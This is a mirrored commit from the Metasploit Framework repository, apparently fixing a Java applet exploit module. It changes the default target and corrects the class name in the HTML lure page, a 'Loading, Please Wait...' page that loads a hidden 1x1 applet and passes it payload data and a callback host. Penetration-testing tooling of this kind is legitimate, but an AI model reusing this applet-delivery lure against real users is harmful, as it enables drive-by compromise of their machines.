1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-11-12 11:52:01 +01:00

Fix a bug missed due to caching issues.

git-svn-id: file:///home/svn/framework3/trunk@8276 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
natron 2010-01-27 20:58:13 +00:00
parent e224d621aa
commit 5e4442a4d4

View File

@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
],
],
'DefaultTarget' => 1
'DefaultTarget' => 0
))
register_options(
[
@ -418,7 +418,7 @@ public class #{datastore['APPLETNAME']} extends Applet
html = "<html><head><title>Loading, Please Wait...</title></head>"
html += "<body><center><p>Loading, Please Wait...</p></center>"
html += "<applet archive=\"#{datastore['APPLETNAME']}.jar\" "
html += "code=\"#{datastore['CLASSNAME']}.class\" width=\"1\" height=\"1\">"
html += "code=\"#{datastore['APPLETNAME']}.class\" width=\"1\" height=\"1\">"
html += "<param name=\"data\" value=\"#{data}\"/>" if data
html += "<param name=\"lhost\" value=\"#{host}\"/>" if host